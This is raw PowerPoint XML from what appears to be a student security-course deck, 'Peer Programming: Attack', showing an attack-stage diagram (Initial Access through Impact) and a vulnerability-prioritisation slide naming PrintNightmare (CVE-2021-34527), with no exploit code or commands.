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7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59" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="268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B2FA9F-17A2-4469-BE8F-5E5836611DB2}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="257"/>
            <p14:sldId id="258"/>
            <p14:sldId id="269"/>
            <p14:sldId id="270"/>
            <p14:sldId id="271"/>
            <p14:sldId id="272"/>
            <p14:sldId id="273"/>
            <p14:sldId id="274"/>
            <p14:sldId id="259"/>
            <p14:sldId id="267"/>
            <p14:sldId id="268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83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0AC09-9E20-4AB1-B936-D133FBF62C0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A0BC772-CDE8-4BC4-BAB1-DE0E914708CF}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-NZ" dirty="0"/>
            <a:t>Initial Access</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A00BAB0F-3B9F-4876-9F99-D551F1B3CF36}" type="parTrans" cxnId="{8ABC4B31-C61A-4236-97D6-22A26EC0546A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-NZ"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FF79DB1-5537-4DB3-AD69-D230C09D0DEC}" type="sibTrans" cxnId="{8ABC4B31-C61A-4236-97D6-22A26EC0546A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-NZ"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FBC8038D-4C4A-4198-BC66-F80F42CB62F7}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-NZ" dirty="0"/>
            <a:t>Execution</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44F22AF1-B477-4E40-8B3A-D220489D15B7}" type="parTrans" cxnId="{B469247A-C7C7-4C54-AC0D-39EA79E633FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-NZ"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{327F3648-FAE7-486C-93C2-676992F99688}" type="sibTrans" cxnId="{B469247A-C7C7-4C54-AC0D-39EA79E633FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-NZ"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B50407A-2AF6-4AB6-A93E-FFD419A9ABB4}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-NZ" dirty="0"/>
            <a:t>Persistence</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64C17CAD-3E9A-411C-83C0-61D669F95E97}" type="parTrans" cxnId="{D742BE42-D88D-4B8F-8ADD-BAE4B1EBF8D6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-NZ"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F16533F0-D950-41E6-AB04-92C4A192A7E0}" type="sibTrans" cxnId="{D742BE42-D88D-4B8F-8ADD-BAE4B1EBF8D6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-NZ"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A811AD1-1872-4471-9D04-E1F638227449}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-NZ" dirty="0"/>
            <a:t>Impact</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{12FF9B65-1DE5-4640-A482-8669FC3F966E}" type="parTrans" cxnId="{42ECE69A-419C-411A-A7AF-729408379FAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-NZ"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE32D7E7-571F-49A9-8C51-A039AD19680D}" type="sibTrans" cxnId="{42ECE69A-419C-411A-A7AF-729408379FAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-NZ"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1392C19B-DC4D-4790-969C-BB97BF081428}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-NZ" dirty="0"/>
            <a:t>Discovery</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79469C39-DA15-4AC6-AA80-4F9AEA9B44F8}" type="parTrans" cxnId="{63192104-A1F4-41B4-8E53-3A575D307DA9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-NZ"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F4C24B0-B1CC-4F30-BAF8-67427041C945}" type="sibTrans" cxnId="{63192104-A1F4-41B4-8E53-3A575D307DA9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-NZ"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{320083B6-E378-40CD-A1D7-BD4BC4E4FB60}" type="pres">
      <dgm:prSet presAssocID="{BDA0AC09-9E20-4AB1-B936-D133FBF62C04}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BDE0CB05-D11A-4DBC-8B7D-9F587719887E}" type="pres">
      <dgm:prSet presAssocID="{0A0BC772-CDE8-4BC4-BAB1-DE0E914708CF}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{95E0EB0C-9A5A-40CF-960D-2B1616D0C77D}" type="pres">
      <dgm:prSet presAssocID="{0FF79DB1-5537-4DB3-AD69-D230C09D0DEC}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F356AEF1-F546-477D-BD7B-9664A8BB2016}" type="pres">
      <dgm:prSet presAssocID="{0FF79DB1-5537-4DB3-AD69-D230C09D0DEC}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4D6E97EE-1B4A-41B9-95B2-D71EFFA85C3F}" type="pres">
      <dgm:prSet presAssocID="{FBC8038D-4C4A-4198-BC66-F80F42CB62F7}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9C0FB4B6-F87C-48A7-8278-4B07074660BC}" type="pres">
      <dgm:prSet presAssocID="{327F3648-FAE7-486C-93C2-676992F99688}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7574CDF0-BD8E-4C0A-8B6C-4238B1FA5FA7}" type="pres">
      <dgm:prSet presAssocID="{327F3648-FAE7-486C-93C2-676992F99688}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A5CB28C7-0766-4636-9382-6E34D611A12A}" type="pres">
      <dgm:prSet presAssocID="{0B50407A-2AF6-4AB6-A93E-FFD419A9ABB4}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E454872E-F0C1-475D-B842-AEBA2A1362AB}" type="pres">
      <dgm:prSet presAssocID="{F16533F0-D950-41E6-AB04-92C4A192A7E0}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C9E52813-EBC6-4B36-B63F-45A8A9CA9EC0}" type="pres">
      <dgm:prSet presAssocID="{F16533F0-D950-41E6-AB04-92C4A192A7E0}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{95F9606B-4B11-413C-A991-44A03B368CE8}" type="pres">
      <dgm:prSet presAssocID="{1392C19B-DC4D-4790-969C-BB97BF081428}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{04DD7A17-610B-44FB-95DB-DEB498B0B2EE}" type="pres">
      <dgm:prSet presAssocID="{3F4C24B0-B1CC-4F30-BAF8-67427041C945}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{027233FB-148A-4F6A-8D98-19FA30907ABE}" type="pres">
      <dgm:prSet presAssocID="{3F4C24B0-B1CC-4F30-BAF8-67427041C945}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{121A08E0-7E10-4201-85DB-DE2980FB6CD0}" type="pres">
      <dgm:prSet presAssocID="{0A811AD1-1872-4471-9D04-E1F638227449}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{A2CAFD02-16FF-4087-BED4-72C9D6FAC10F}" type="presOf" srcId="{3F4C24B0-B1CC-4F30-BAF8-67427041C945}" destId="{027233FB-148A-4F6A-8D98-19FA30907ABE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{63192104-A1F4-41B4-8E53-3A575D307DA9}" srcId="{BDA0AC09-9E20-4AB1-B936-D133FBF62C04}" destId="{1392C19B-DC4D-4790-969C-BB97BF081428}" srcOrd="3" destOrd="0" parTransId="{79469C39-DA15-4AC6-AA80-4F9AEA9B44F8}" sibTransId="{3F4C24B0-B1CC-4F30-BAF8-67427041C945}"/>
    <dgm:cxn modelId="{2D312904-6B18-4DEC-9DFA-6DA5EBE18B38}" type="presOf" srcId="{327F3648-FAE7-486C-93C2-676992F99688}" destId="{9C0FB4B6-F87C-48A7-8278-4B07074660BC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{CF5D0F0B-45AF-411A-A465-5EB1178DC099}" type="presOf" srcId="{BDA0AC09-9E20-4AB1-B936-D133FBF62C04}" destId="{320083B6-E378-40CD-A1D7-BD4BC4E4FB60}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{8E4AA30D-CD6F-4A9B-86C3-CDF23804FB88}" type="presOf" srcId="{F16533F0-D950-41E6-AB04-92C4A192A7E0}" destId="{E454872E-F0C1-475D-B842-AEBA2A1362AB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{2CB48F11-6201-44AE-8D38-C73C516920B8}" type="presOf" srcId="{0A811AD1-1872-4471-9D04-E1F638227449}" destId="{121A08E0-7E10-4201-85DB-DE2980FB6CD0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{D727681D-78F8-40AF-B4F4-5F318F4200A2}" type="presOf" srcId="{FBC8038D-4C4A-4198-BC66-F80F42CB62F7}" destId="{4D6E97EE-1B4A-41B9-95B2-D71EFFA85C3F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{8ABC4B31-C61A-4236-97D6-22A26EC0546A}" srcId="{BDA0AC09-9E20-4AB1-B936-D133FBF62C04}" destId="{0A0BC772-CDE8-4BC4-BAB1-DE0E914708CF}" srcOrd="0" destOrd="0" parTransId="{A00BAB0F-3B9F-4876-9F99-D551F1B3CF36}" sibTransId="{0FF79DB1-5537-4DB3-AD69-D230C09D0DEC}"/>
    <dgm:cxn modelId="{D742BE42-D88D-4B8F-8ADD-BAE4B1EBF8D6}" srcId="{BDA0AC09-9E20-4AB1-B936-D133FBF62C04}" destId="{0B50407A-2AF6-4AB6-A93E-FFD419A9ABB4}" srcOrd="2" destOrd="0" parTransId="{64C17CAD-3E9A-411C-83C0-61D669F95E97}" sibTransId="{F16533F0-D950-41E6-AB04-92C4A192A7E0}"/>
    <dgm:cxn modelId="{A8062447-570D-4C64-BB39-E193874CA85E}" type="presOf" srcId="{3F4C24B0-B1CC-4F30-BAF8-67427041C945}" destId="{04DD7A17-610B-44FB-95DB-DEB498B0B2EE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{1415786B-3405-4124-9884-9897EC7A2CDD}" type="presOf" srcId="{0A0BC772-CDE8-4BC4-BAB1-DE0E914708CF}" destId="{BDE0CB05-D11A-4DBC-8B7D-9F587719887E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{68397775-0983-4615-AC5D-FD366FA83EE5}" type="presOf" srcId="{0FF79DB1-5537-4DB3-AD69-D230C09D0DEC}" destId="{95E0EB0C-9A5A-40CF-960D-2B1616D0C77D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{6142DC57-5C8F-4581-94D8-280DF05E74A9}" type="presOf" srcId="{0B50407A-2AF6-4AB6-A93E-FFD419A9ABB4}" destId="{A5CB28C7-0766-4636-9382-6E34D611A12A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{F2C41959-E9E6-4C3F-9E52-DE8FF17D4C12}" type="presOf" srcId="{1392C19B-DC4D-4790-969C-BB97BF081428}" destId="{95F9606B-4B11-413C-A991-44A03B368CE8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{B469247A-C7C7-4C54-AC0D-39EA79E633FF}" srcId="{BDA0AC09-9E20-4AB1-B936-D133FBF62C04}" destId="{FBC8038D-4C4A-4198-BC66-F80F42CB62F7}" srcOrd="1" destOrd="0" parTransId="{44F22AF1-B477-4E40-8B3A-D220489D15B7}" sibTransId="{327F3648-FAE7-486C-93C2-676992F99688}"/>
    <dgm:cxn modelId="{42ECE69A-419C-411A-A7AF-729408379FAC}" srcId="{BDA0AC09-9E20-4AB1-B936-D133FBF62C04}" destId="{0A811AD1-1872-4471-9D04-E1F638227449}" srcOrd="4" destOrd="0" parTransId="{12FF9B65-1DE5-4640-A482-8669FC3F966E}" sibTransId="{FE32D7E7-571F-49A9-8C51-A039AD19680D}"/>
    <dgm:cxn modelId="{ED618BB1-43F7-4D84-A47A-58FEC335CC42}" type="presOf" srcId="{0FF79DB1-5537-4DB3-AD69-D230C09D0DEC}" destId="{F356AEF1-F546-477D-BD7B-9664A8BB2016}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{10E208BF-B99C-472C-AA6B-C9E0F821FA6B}" type="presOf" srcId="{327F3648-FAE7-486C-93C2-676992F99688}" destId="{7574CDF0-BD8E-4C0A-8B6C-4238B1FA5FA7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{E79E17FE-0801-4620-B108-ED44CC0E673F}" type="presOf" srcId="{F16533F0-D950-41E6-AB04-92C4A192A7E0}" destId="{C9E52813-EBC6-4B36-B63F-45A8A9CA9EC0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{B848B065-A5AD-44E3-87EA-809C1B3B8C50}" type="presParOf" srcId="{320083B6-E378-40CD-A1D7-BD4BC4E4FB60}" destId="{BDE0CB05-D11A-4DBC-8B7D-9F587719887E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{6007C015-C697-430A-A824-B52EFA117F3C}" type="presParOf" srcId="{320083B6-E378-40CD-A1D7-BD4BC4E4FB60}" destId="{95E0EB0C-9A5A-40CF-960D-2B1616D0C77D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{0F668813-B387-464D-AA2D-00B5FA2363A5}" type="presParOf" srcId="{95E0EB0C-9A5A-40CF-960D-2B1616D0C77D}" destId="{F356AEF1-F546-477D-BD7B-9664A8BB2016}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{3E82398D-D533-486F-9173-59753D8B2CE9}" type="presParOf" srcId="{320083B6-E378-40CD-A1D7-BD4BC4E4FB60}" destId="{4D6E97EE-1B4A-41B9-95B2-D71EFFA85C3F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{D922C734-6C91-4BB1-9A61-C824307E8A86}" type="presParOf" srcId="{320083B6-E378-40CD-A1D7-BD4BC4E4FB60}" destId="{9C0FB4B6-F87C-48A7-8278-4B07074660BC}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{51CB6AB8-3B3D-4F61-BFB4-DF6A14E9CEA3}" type="presParOf" srcId="{9C0FB4B6-F87C-48A7-8278-4B07074660BC}" destId="{7574CDF0-BD8E-4C0A-8B6C-4238B1FA5FA7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{808B6D3F-FD32-4BE4-9925-03CB218577BB}" type="presParOf" srcId="{320083B6-E378-40CD-A1D7-BD4BC4E4FB60}" destId="{A5CB28C7-0766-4636-9382-6E34D611A12A}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{E5D39D1A-97A4-4FFF-B2B2-9577E0026603}" type="presParOf" srcId="{320083B6-E378-40CD-A1D7-BD4BC4E4FB60}" destId="{E454872E-F0C1-475D-B842-AEBA2A1362AB}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{BBCC192D-976B-414C-9A20-E7CD362E6D73}" type="presParOf" srcId="{E454872E-F0C1-475D-B842-AEBA2A1362AB}" destId="{C9E52813-EBC6-4B36-B63F-45A8A9CA9EC0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{DB7A62DE-DC22-4108-9479-32D6F58B433E}" type="presParOf" srcId="{320083B6-E378-40CD-A1D7-BD4BC4E4FB60}" destId="{95F9606B-4B11-413C-A991-44A03B368CE8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{26D191E6-2C5D-4D15-8C06-99A52D1E8AD5}" type="presParOf" srcId="{320083B6-E378-40CD-A1D7-BD4BC4E4FB60}" destId="{04DD7A17-610B-44FB-95DB-DEB498B0B2EE}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{923BA8C6-A492-47D7-870E-95A64AFE75DB}" type="presParOf" srcId="{04DD7A17-610B-44FB-95DB-DEB498B0B2EE}" destId="{027233FB-148A-4F6A-8D98-19FA30907ABE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{FDE939DA-3E31-4AA0-B401-130173868F57}" type="presParOf" srcId="{320083B6-E378-40CD-A1D7-BD4BC4E4FB60}" destId="{121A08E0-7E10-4201-85DB-DE2980FB6CD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0CB05-D11A-4DBC-8B7D-9F587719887E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2683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Initial Access</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="17304" y="1827501"/>
        <a:ext cx="802756" cy="469957"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{95E0EB0C-9A5A-40CF-960D-2B1616D0C77D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="917882" y="1959312"/>
          <a:ext cx="176383" cy="20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800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="917882" y="2000579"/>
        <a:ext cx="123468" cy="123801"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4D6E97EE-1B4A-41B9-95B2-D71EFFA85C3F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1167482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Execution</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1182103" y="1827501"/>
        <a:ext cx="802756" cy="469957"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9C0FB4B6-F87C-48A7-8278-4B07074660BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2082680" y="1959312"/>
          <a:ext cx="176383" cy="20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800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2082680" y="2000579"/>
        <a:ext cx="123468" cy="123801"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A5CB28C7-0766-4636-9382-6E34D611A12A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2332280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Persistence</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2346901" y="1827501"/>
        <a:ext cx="802756" cy="469957"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E454872E-F0C1-475D-B842-AEBA2A1362AB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3247479" y="1959312"/>
          <a:ext cx="176383" cy="20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800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3247479" y="2000579"/>
        <a:ext cx="123468" cy="123801"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{95F9606B-4B11-413C-A991-44A03B368CE8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3497078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Discovery</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3511699" y="1827501"/>
        <a:ext cx="802756" cy="469957"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{04DD7A17-610B-44FB-95DB-DEB498B0B2EE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4412277" y="1959312"/>
          <a:ext cx="176383" cy="20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800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4412277" y="2000579"/>
        <a:ext cx="123468" cy="123801"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{121A08E0-7E10-4201-85DB-DE2980FB6CD0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4661877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Impact</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4676498" y="1827501"/>
        <a:ext cx="802756" cy="46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62BA-6317-4893-AB17-C443B0173D8C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28AF-D3E1-4D24-B8DC-99CD57C30C6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5009-16CC-46CA-BDB4-F9CD31C7023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CAA6-CEC4-4299-965E-494374F8A4AC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914-2680-46B5-908A-9F31A98DC89D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2D9DDEBB-39D8-49F9-B69B-0ACB3110EF73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2E81-6EEB-4882-92C5-D630F2F9A245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A659-CD0F-42B4-8A47-FD3B17567DA8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50-68E9-4FD6-935C-3DF853E1165D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0E5616-76C2-4183-ACDF-FFB9D459ECEF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canaryco/atomic-red-tea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BF45EA0-160C-6852-4D0A-EC8038A7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96" r="9091" b="360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F59AC-C691-9092-09F4-50F1A971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US" sz="5600"/>
              <a:t>Peer Programming: Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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F951-4545-3E50-36FB-4CAB10530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Submitted by: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Ujjwal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>Dhakal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> (12222900)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1900" dirty="0"/>
              <a:t>Tanisha Mani Oishi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15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2A29-DB70-CAA0-C349-7D89078A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450311" cy="3101979"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Task 3:Prioritise the Vulnerabilities for the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Organization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CVE-2021-34527 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>PrintNightmare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Action: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0"/>
              <a:t>Take Action</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Rationale:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
